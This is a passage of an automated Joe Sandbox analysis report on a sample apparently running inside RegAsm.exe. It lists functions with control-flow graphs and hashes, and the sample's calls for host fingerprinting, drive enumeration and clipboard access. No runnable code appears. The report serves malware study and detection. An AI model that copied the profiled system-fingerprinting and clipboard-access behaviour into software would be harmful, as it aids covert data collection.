        control_flow_graph 610 428343-4283b7 call 43ca00 614 428413-42841c 610->614 615 4283b9 610->615 617 42843b-428447 614->617 618 42841e-428424 614->618 616 4283c0-428411 615->616 616->614 616->616 620 42845b-4284e4 FreeLibrary call 43ca00 GetComputerNameExA 617->620 621 428449-42844f 617->621 619 428430-428439 618->619 619->617 619->619 626 4284e6 620->626 627 42854e-428557 620->627 622 428450-428459 621->622 622->620 622->622 628 4284f0-42854c 626->628 629 428559-428565 627->629 630 42857d 627->630 628->627 628->628 631 428570-428579 629->631 632 428583-42858f 630->632 631->631 633 42857b 631->633 634 428591-428597 632->634 635 4285ab-42861b GetComputerNameExA 632->635 633->632 636 4285a0-4285a9 634->636 637 42868a-428693 635->637 638 42861d-42861f 635->638 636->635 636->636 640 428695-42869f 637->640 641 4286ad 637->641 639 428620-428688 638->639 639->637 639->639 643 4286a0-4286a9 640->643 642 4286b0-4286bc 641->642 644 4286db-42874d 642->644 645 4286be-4286c4 642->645 643->643 646 4286ab 643->646 649 42874f 644->649 650 4287ad-4287b6 644->650 647 4286d0-4286d9 645->647 646->642 647->644 647->647 651 428750-4287ab 649->651 652 4287cb-4287d7 650->652 653 4287b8-4287bf 650->653 651->650 651->651 655 4287eb-428868 call 43ca00 652->655 656 4287d9-4287df 652->656 654 4287c0-4287c9 653->654 654->652 654->654 661 4288b3-4288bc 655->661 662 42886a 655->662 657 4287e0-4287e9 656->657 657->655 657->657 664 4288db-4288e8 661->664 665 4288be-4288c4 661->665 663 428870-4288b1 662->663 663->661 663->663 667 428908-428913 664->667 666 4288d0-4288d9 665->666 666->664 666->666 668 42899a-42899c 667->668 669 428919-428920 667->669 670 4289a2-4289ec 668->670 671 428922-428939 669->671 672 4288f0-4288f4 669->672 673 428a38-428a41 670->673 674 4289ee-4289ef 670->674 675 428960-428968 671->675 676 42893b-42893e 671->676 677 4288f9-428902 672->677 681 428a43-428a4b 673->681 682 428a5d 673->682 679 4289f0-428a36 674->679 675->677 678 42896a-428995 675->678 676->675 683 428940-42895c 676->683 677->667 680 42899e-4289a0 677->680 678->677 679->673 679->679 680->670 685 428a50-428a59 681->685 684 428a5f-428a62 call 42e440 682->684 683->677 688 428a67-428a83 684->688 685->685 687 428a5b 685->687 687->684
        APIs
        • FreeLibrary.KERNEL32(?), ref: 00428464
        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004284A0
        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004285CC
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: ComputerName$FreeLibrary
        • String ID: ESIZ
        • API String ID: 2243422189-1232186204
        • Opcode ID: 5fef9b3106bf94a8d3020770181974765055f3be71e4427543e8478773e5dcbb
        • Instruction ID: 107eeaf0f484fc26e1d056c6c5a96a53ad66f040f9949cd173fbe651eae6af85
        • Opcode Fuzzy Hash: 5fef9b3106bf94a8d3020770181974765055f3be71e4427543e8478773e5dcbb
        • Instruction Fuzzy Hash: 56F19E70105B518ED725CF34C894BE7BBE1AF16309F88486DC0FA8B282DB79B446CB59
        Function 0042833D Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 451COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 744 42833d-428475 call 43ca00 747 42847a-4284e4 GetComputerNameExA 744->747 748 4284e6 747->748 749 42854e-428557 747->749 750 4284f0-42854c 748->750 751 428559-428565 749->751 752 42857d 749->752 750->749 750->750 753 428570-428579 751->753 754 428583-42858f 752->754 753->753 755 42857b 753->755 756 428591-428597 754->756 757 4285ab-42861b GetComputerNameExA 754->757 755->754 758 4285a0-4285a9 756->758 759 42868a-428693 757->759 760 42861d-42861f 757->760 758->757 758->758 762 428695-42869f 759->762 763 4286ad 759->763 761 428620-428688 760->761 761->759 761->761 765 4286a0-4286a9 762->765 764 4286b0-4286bc 763->764 766 4286db-42874d 764->766 767 4286be-4286c4 764->767 765->765 768 4286ab 765->768 771 42874f 766->771 772 4287ad-4287b6 766->772 769 4286d0-4286d9 767->769 768->764 769->766 769->769 773 428750-4287ab 771->773 774 4287cb-4287d7 772->774 775 4287b8-4287bf 772->775 773->772 773->773 777 4287eb-428868 call 43ca00 774->777 778 4287d9-4287df 774->778 776 4287c0-4287c9 775->776 776->774 776->776 783 4288b3-4288bc 777->783 784 42886a 777->784 779 4287e0-4287e9 778->779 779->777 779->779 786 4288db-4288e8 783->786 787 4288be-4288c4 783->787 785 428870-4288b1 784->785 785->783 785->785 789 428908-428913 786->789 788 4288d0-4288d9 787->788 788->786 788->788 790 42899a-42899c 789->790 791 428919-428920 789->791 792 4289a2-4289ec 790->792 793 428922-428939 791->793 794 4288f0-4288f4 791->794 795 428a38-428a41 792->795 796 4289ee-4289ef 792->796 797 428960-428968 793->797 798 42893b-42893e 793->798 799 4288f9-428902 794->799 803 428a43-428a4b 795->803 804 428a5d 795->804 801 4289f0-428a36 796->801 797->799 800 42896a-428995 797->800 798->797 805 428940-42895c 798->805 799->789 802 42899e-4289a0 799->802 800->799 801->795 801->801 802->792 807 428a50-428a59 803->807 806 428a5f-428a62 call 42e440 804->806 805->799 810 428a67-428a83 806->810 807->807 809 428a5b 807->809 809->806
        APIs
        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 004284A0
        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 004285CC
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: ComputerName
        • String ID: ESIZ
        • API String ID: 3545744682-1232186204
        • Opcode ID: c21be24aaba47a1ff64b0cb5ea4f6df0152d926d2a546ab2927edcf79d3b28ec
        • Instruction ID: caece19477bbeddae42eb6e9da0290b6207a0dc70146bc8faadc5ec4be251040
        • Opcode Fuzzy Hash: c21be24aaba47a1ff64b0cb5ea4f6df0152d926d2a546ab2927edcf79d3b28ec
        • Instruction Fuzzy Hash: 04027E70205B528FD725CF34C8907A7BBE1AF56304F98486ED0EA87782CB79B446CB55
        Function 0043686C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
        Download Yara Rule
        APIs
        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004368A9
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: InformationVolume
        • String ID: C$\
        • API String ID: 2039140958-514332402
        • Opcode ID: c453d63eca7fa889acf43d4105d7dd8f59b0f5e53740a5b4c4497ad910ecf8eb
        • Instruction ID: 6bc66be043ab83f7e14e5e5f61a353f0f93fc06736be262c3079a6f27a06a90d
        • Opcode Fuzzy Hash: c453d63eca7fa889acf43d4105d7dd8f59b0f5e53740a5b4c4497ad910ecf8eb
        • Instruction Fuzzy Hash: DDF092B9294341BBE314DF20DC62F2A3294FB45B08F20482CB24BF61D0CBF4B9009A4E
        Function 00409530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
        Download Yara Rule
        APIs
        Strings
        • system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 00409562
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: ExitProcess
        • String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
        • API String ID: 621844428-780655312
        • Opcode ID: 97be74b9bb0609293a5e55ee57a2341dfee3e9de6ada01080e19258a4a21601b
        • Instruction ID: 2ab813ea5f014a0b2211c64ac1eb16e07fc62c0c69bb2f1ca759e36280769154
        • Opcode Fuzzy Hash: 97be74b9bb0609293a5e55ee57a2341dfee3e9de6ada01080e19258a4a21601b
        • Instruction Fuzzy Hash: F0F082B2814210B5CA123BB79E0626F36A85E5535CF50083BED81B21C3EA3C4D1A97AF
        Function 0042D670 Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocString
        • String ID:
        • API String ID: 2525500382-0
        • Opcode ID: 9c467ed3b848cf21e5e74aa2aaddb84ee9e7f911adc94d0ee280a7d56254f9bb
        • Instruction ID: bfdf1960619fe11e79ca71d1c60cc00dfd7c8e4f9b3430ffd1da66fae9831d2a
        • Opcode Fuzzy Hash: 9c467ed3b848cf21e5e74aa2aaddb84ee9e7f911adc94d0ee280a7d56254f9bb
        • Instruction Fuzzy Hash: FD41E460108F829ED366CB38C598742FBE1BB56214F048789D0AA8BB91D374B565CB92
        Function 0043A71C Relevance: 1.6, APIs: 1, Instructions: 70libraryCOMMON
        Download Yara Rule
        APIs
        • LoadLibraryExW.KERNELBASE(?,00000000,00000800), ref: 0043A7C1
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: LibraryLoad
        • String ID:
        • API String ID: 1029625771-0
        • Opcode ID: 2fc65689c9f4261c712c8d238fb41edd77dbdc3d5de3ef7c8eb14687863c5a44
        • Instruction ID: fa0cef23d453a3069a770009fd0405c4018592c7011080208cd168a447dc3778
        • Opcode Fuzzy Hash: 2fc65689c9f4261c712c8d238fb41edd77dbdc3d5de3ef7c8eb14687863c5a44
        • Instruction Fuzzy Hash: 09217F752406429FD328CF19C8A0A26B7F2FF99300B298A1DD0D297B55CB74F865CBC9
        Function 00438800 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
        Download Yara Rule
        APIs
        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 0043889F
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 5bcece1c03e78da2e9087ec5e943b8abd02f23127b79b626b8827565f725fe94
        • Instruction ID: 7be10c684662338dbfc0f8bce7f21e7d81a63dd3bdc270857606bdcfbec2d806
        • Opcode Fuzzy Hash: 5bcece1c03e78da2e9087ec5e943b8abd02f23127b79b626b8827565f725fe94
        • Instruction Fuzzy Hash: 8E11AC326082028BD304EF18C851B5ABBE5EB88718F08892CE0C8C73A1D779E855CB86
        Function 004103F7 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
        Download Yara Rule
        APIs
        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004103FD
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: DirectorySystem
        • String ID:
        • API String ID: 2188284642-0
        • Opcode ID: 3d84e0c53d5a37151eea48f4afb3fac4d165dcdf4433bc3406452530f76cb1d0
        • Instruction ID: 7cc36ceb920871c8c6d66fd4276466350dc9c8e231d8d33e6ab260e294c182e7
        • Opcode Fuzzy Hash: 3d84e0c53d5a37151eea48f4afb3fac4d165dcdf4433bc3406452530f76cb1d0
        • Instruction Fuzzy Hash: 74F04CF49042914BC7348B109CE167F3394AF55308F05003FD586C6312DA785CC5C619
        Function 0043A100 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
        Download Yara Rule
        APIs
        • GetLogicalDrives.KERNELBASE ref: 0043A100
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: DrivesLogical
        • String ID:
        • API String ID: 999431828-0
        • Opcode ID: 6789bf0cf5d3ba422bce8a14c70c0bd7b7677a90bc5732cded0f2e40de171061
        • Instruction ID: 4d5d26bab624afb83cf63971fe22b474cca0126a6a3e433b0c01ad88c01b978a
        • Opcode Fuzzy Hash: 6789bf0cf5d3ba422bce8a14c70c0bd7b7677a90bc5732cded0f2e40de171061
        • Instruction Fuzzy Hash: 7AE032B96002018BC324CF20E882922F7E5FB4E304314693ED986D7741D634E805CB48
        Function 004389C2 Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
        Download Yara Rule
        APIs
        • RtlFreeHeap.NTDLL(?,00000000), ref: 004389C8
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: FreeHeap
        • String ID:
        • API String ID: 3298025750-0
        • Opcode ID: c8eb1b5f902db61b7fdcf8998cd4d462fcf4ac418044278937692415990431ca
        • Instruction ID: b99520e442b5103068d20eebea8ceedfe316ff1c9b725666a4638859ffb814d3
        • Opcode Fuzzy Hash: c8eb1b5f902db61b7fdcf8998cd4d462fcf4ac418044278937692415990431ca
        • Instruction Fuzzy Hash: FFC080391441009FD6048F10DC45B353369F755705F10187CE506C12E3CA20DC15DD0C
        Function 0043AA76 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
        Download Yara Rule
        APIs
        • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 0043AA7D
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: e48826d4c4b75912ac203f9eb20402879578ed53c4114f2f30e14c69dc3f2eb1
        • Instruction ID: bc01fb9524668cde8e3e97ee74b7d0957eb987fe7114e3071a8faee555c0f673
        • Opcode Fuzzy Hash: e48826d4c4b75912ac203f9eb20402879578ed53c4114f2f30e14c69dc3f2eb1
        • Instruction Fuzzy Hash: C4C012381481089BD608CB10EC91F76372EE7CA612F148028E48343361C23098139A18

        Non-executed Functions

        Function 00430CF0 Relevance: 9.2, APIs: 6, Instructions: 179clipboardCOMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID: Clipboard$CloseDataLongOpenWindow
        • String ID:
        • API String ID: 1647500905-0
        • Opcode ID: c42072921177bc784a49dc2ecde762dfeaa1b47fa3ce775427dbbe90ea03cd3e
        • Instruction ID: a58f9c31ffd0da66f335f8d56462364fb8cf3bd821a58cce9afa8a919224b9c1
        • Opcode Fuzzy Hash: c42072921177bc784a49dc2ecde762dfeaa1b47fa3ce775427dbbe90ea03cd3e
        • Instruction Fuzzy Hash: EB717D74608B41DFC320DF78C45561ABBE0AF1A310F108B6EE4DA87791D738A855DB97
        Function 00423976 Relevance: 6.9, Strings: 5, Instructions: 640COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: #M*O$.A+C$<Y9[$de$q
        • API String ID: 0-2301291036
        • Opcode ID: 2e8f5385e92c8c6e7ec2eeb3d3e635bf3f26ae69e773f5ccbf44b89f15b7456c
        • Instruction ID: aa240042138c986817e9b4b358af31d3fe11580a1198047475b9b9fa5582111f
        • Opcode Fuzzy Hash: 2e8f5385e92c8c6e7ec2eeb3d3e635bf3f26ae69e773f5ccbf44b89f15b7456c
        • Instruction Fuzzy Hash: 3622ED75A083518FD324CF24E88072BB7F2AFC6314F55892DE88A97391D738D945CB8A
        Function 00425A2A Relevance: 1.7, Strings: 1, Instructions: 456COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: P_B
        • API String ID: 0-906794629
        • Opcode ID: a09de4cff80ece7cf7e5d5501bfcc30739e2e0a5fc213040b74ebebb36e32223
        • Instruction ID: 247aeb099a37abac29fb2abe1af913bc7e9570d8043b8720d2e58d3f13425c6b
        • Opcode Fuzzy Hash: a09de4cff80ece7cf7e5d5501bfcc30739e2e0a5fc213040b74ebebb36e32223
        • Instruction Fuzzy Hash: 6DD19C712083218BD714DF18D8A1B6BB7F1FF95354F448A1DE4C18B3A0E3789945CB9A
        Function 004241DE Relevance: 1.7, Strings: 1, Instructions: 405COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: "
        • API String ID: 0-123907689
        • Opcode ID: 73303fa99c23672edcd91aa0bc4b03b67aaca62d52c59e1dfb1f0fc5beb92917
        • Instruction ID: 232c928df96498e70451627f886274eb343c6cc0946caba914b60865c80523c0
        • Opcode Fuzzy Hash: 73303fa99c23672edcd91aa0bc4b03b67aaca62d52c59e1dfb1f0fc5beb92917
        • Instruction Fuzzy Hash: 18E116716082518FD724CF28D88032ABBE3EFDB320F59476EE495973E1C77899458B46
        Function 00436AD2 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 2mC
        • API String ID: 0-3878219052
        • Opcode ID: a1de98b2818a2a28d9ca77c7a86fe1de837eff0c9eb8b35c304899fd18acab2f
        • Instruction ID: 5720ded9b0efbdedd827fa4885a4df752158c37772ef617e7de1af59f48536f2
        • Opcode Fuzzy Hash: a1de98b2818a2a28d9ca77c7a86fe1de837eff0c9eb8b35c304899fd18acab2f
        • Instruction Fuzzy Hash: C9618D742047019FD728CF19D490B27B7E1FB4D304F14992EE59A8BB91CB75E451CB98
        Function 00413D71 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: b
        • API String ID: 0-1908338681
        • Opcode ID: 1017eab8d6116623c7ffa8d6d6b1b71d4f7cd099dd98ff40ede101813820451b
        • Instruction ID: 80932a96dabd6fba4884692ddb85ff075f5917e2d19bc36c452f934854995108
        • Opcode Fuzzy Hash: 1017eab8d6116623c7ffa8d6d6b1b71d4f7cd099dd98ff40ede101813820451b
        • Instruction Fuzzy Hash: C6519C756082408FD344EF28C884B6EBBE5EF96304F48A92DE0C5C3352D739D855CB5A
        Function 0043AC04 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: 498;
        • API String ID: 0-3542301482
        • Opcode ID: 09a9a01646e12645aaf5c968d4c14030ce9929390587507658b93841de193463
        • Instruction ID: ac37a49ea8b69cea9736704d5cedc65c3feb6e6e51624a86b23fe8f485ff2691
        • Opcode Fuzzy Hash: 09a9a01646e12645aaf5c968d4c14030ce9929390587507658b93841de193463
        • Instruction Fuzzy Hash: 940104B55583829BD304DF18C890A1BBBE1EBD6394F18A82DF4C5C7761C738D886CB4A
        Function 0043C4BB Relevance: .8, Instructions: 841COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 676654bf90ae7c076ee61dca5fb71295f07adfb3806d79b63123aa3281b0e48a
        • Instruction ID: d96b1b7d1acfd82c45ae602ab2f1db41cd8fad78e31ee9098ef99b4826ea1e4b
        • Opcode Fuzzy Hash: 676654bf90ae7c076ee61dca5fb71295f07adfb3806d79b63123aa3281b0e48a
        • Instruction Fuzzy Hash: 0452CF39608201CFC714CF28D99061AB7F2FF8E315F1A896DD58A97761C734E865CB86
        Function 004083F0 Relevance: .8, Instructions: 827COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 994ddfeb7f87985db57da05d951359d575f408c5735cb59e69eee654325c9775
        • Instruction ID: db93dc518552f9e0816e515711cd38a6c54d0735dbf575617fb0d9a6114185c0
        • Opcode Fuzzy Hash: 994ddfeb7f87985db57da05d951359d575f408c5735cb59e69eee654325c9775
        • Instruction Fuzzy Hash: 4052C3716087118BC724DF18D68067AB3E1FFD4314F19893ED9C6A7385DB38A952CB8A
        Function 0043C5C0 Relevance: .8, Instructions: 812COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d1ed671ef8a2cb44e8f7e893591d7946374c8005618ae340ea25e921c1de7810
        • Instruction ID: 38a9d0a05bd55ec99e73eb7f432d91ecab70fe03f48622fc6ada1aa9483154c4
        • Opcode Fuzzy Hash: d1ed671ef8a2cb44e8f7e893591d7946374c8005618ae340ea25e921c1de7810
        • Instruction Fuzzy Hash: BD42AA36608201CFC714CF28D99061AB7F2FF8E315F1A896DD98A97761C734E856CB86
        Function 0043C7C0 Relevance: .7, Instructions: 690COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c6680dd2cc2a4446fa2f6e9cf8ad5f6abbae828f5cc1c5fffe7c008785fb4a58
        • Instruction ID: d9548218d18cf33fcbe66682fe19dccb8af6609f733d76804b66ef64824dba13
        • Opcode Fuzzy Hash: c6680dd2cc2a4446fa2f6e9cf8ad5f6abbae828f5cc1c5fffe7c008785fb4a58
        • Instruction Fuzzy Hash: 4C32AC35608201CFC718CF28D99061AB7F2FF8E314F1A896DD89A97761D734E856CB86
        Function 00439270 Relevance: .7, Instructions: 656COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: bac76700491854509ec415a84dfd0b784d77b94190e5710fa7ce445890c11f4c
        • Instruction ID: 59d65b411b386426b5fb11d6fc128fa00613d9b939312cb1e3397b9cb6e07d21
        • Opcode Fuzzy Hash: bac76700491854509ec415a84dfd0b784d77b94190e5710fa7ce445890c11f4c
        • Instruction Fuzzy Hash: D822A875A083019FD714CF19C880B2BB7E2BBC9314F589A2EE4959B391D778EC01CB96
        Function 0043C8C0 Relevance: .6, Instructions: 648COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: f34db4a2fed09c2dab522fb6ff9fe118369dc3da74183d1845f2faebba8118fd
        • Instruction ID: 290e51a3c35c362c28d448779af3692e7db43c1f7c69de891923527f616dc0ef
        • Opcode Fuzzy Hash: f34db4a2fed09c2dab522fb6ff9fe118369dc3da74183d1845f2faebba8118fd
        • Instruction Fuzzy Hash: 8322CD35608201CFC718CF28D99065AB7F2FF8E314F1A896DD89A97351D734E856CB86
        Function 0041BB40 Relevance: .5, Instructions: 459COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 90fc3aa887b2855c1f0bb271f259073480a145ef2ad53f759760400e457cb131
        • Instruction ID: 3b9c778957af2ac04a54f9e889ecfca3d244060231a92b6bfdd8168e8b1c2d67
        • Opcode Fuzzy Hash: 90fc3aa887b2855c1f0bb271f259073480a145ef2ad53f759760400e457cb131
        • Instruction Fuzzy Hash: ADD1F4729083118BC714CF28C8917ABB3F2EF99314F08862DE9858B395E778AD81C7D5
        Function 00413940 Relevance: .4, Instructions: 448COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5f286bd4195f7120d0d9b37f52b4064d1f253c6a01f5768f84f14eb3d9d42d49
        • Instruction ID: 6e0facec9e6eb2b8caa887373d178651fb31e6c7f7b6827d1c54b5623ce07eb2
        • Opcode Fuzzy Hash: 5f286bd4195f7120d0d9b37f52b4064d1f253c6a01f5768f84f14eb3d9d42d49
        • Instruction Fuzzy Hash: 09D1BFB19083419BD712DF24C8C07ABBBE4AF96355F44092EF4D687391E738D988C79A
        Function 00416AD0 Relevance: .1, Instructions: 146COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ae31ed283284e28720c5c500a65ac4d6a72693834d8449f8a2337d0ab0f52c5b
        • Instruction ID: 22f88a2dd83cec99b6dd0f9c4efc68ffe64f26af1e1504b8987a511738a931a8
        • Opcode Fuzzy Hash: ae31ed283284e28720c5c500a65ac4d6a72693834d8449f8a2337d0ab0f52c5b
        • Instruction Fuzzy Hash: 4E4106B590C3149BC3219F94C8807A7B7E8EB51318F0A457ED88987382F779EC84C79A
        Function 00438C80 Relevance: .1, Instructions: 100COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 984613e7b19238dd03422d57c58c45a54beaa5e171a10cababbcbfbe51ad76f1
        • Instruction ID: 520b88c8d1416e2c03a1004ef075438dcdb5ea6f1177f41786c8c87d0255b946
        • Opcode Fuzzy Hash: 984613e7b19238dd03422d57c58c45a54beaa5e171a10cababbcbfbe51ad76f1
